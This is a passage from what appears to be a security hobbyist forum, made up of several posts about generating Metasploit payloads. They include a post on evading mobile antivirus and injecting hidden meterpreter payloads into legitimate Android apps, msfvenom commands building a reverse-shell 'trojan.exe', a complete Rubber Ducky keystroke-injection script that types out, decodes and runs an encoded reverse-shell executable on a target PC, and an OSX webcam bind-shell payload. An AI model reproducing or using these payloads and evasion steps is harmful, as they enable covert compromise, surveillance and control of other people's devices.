Search the Community

Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector

I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable: 1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 2.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 3.) msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 4.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -k -f exe > trojan.exe I've also tried using encoders and other payloads. I tried running the executables on multiple Windows 7 64-bit OS computers, but all I got was this message: "The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher." When I tried running it in command prompt it showed me this: Unsupported 16-Bit Application "The program or feature cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available." I'm running Metasploit Framework on both Linux Mint and Kali Linux. I've port forwarded the port, tried changing the IP address, turned off all firewalls and AV software, as well as reinstalling Linux Mint and Kali Linux and updating them plus Metasploit Framework. I've tried google to find a solution, but so far I haven't found it. Any ideas on this problem? Any help would be appreciated.

Is it possible to exploit a pc by Kali Linux without running the exe (file produced by msfvenom) in the victim's pc using metapreter?

So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER

Hello, I'm having some troubles while trying to export some OSX payload for testing purpose using msfvenom and the -o flag. Here is what I enter: sudo msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o someNameHere I'm working on Captain's OSX and whenever I open a 'free' access folder (Documents folder i.e.), msfvenom return me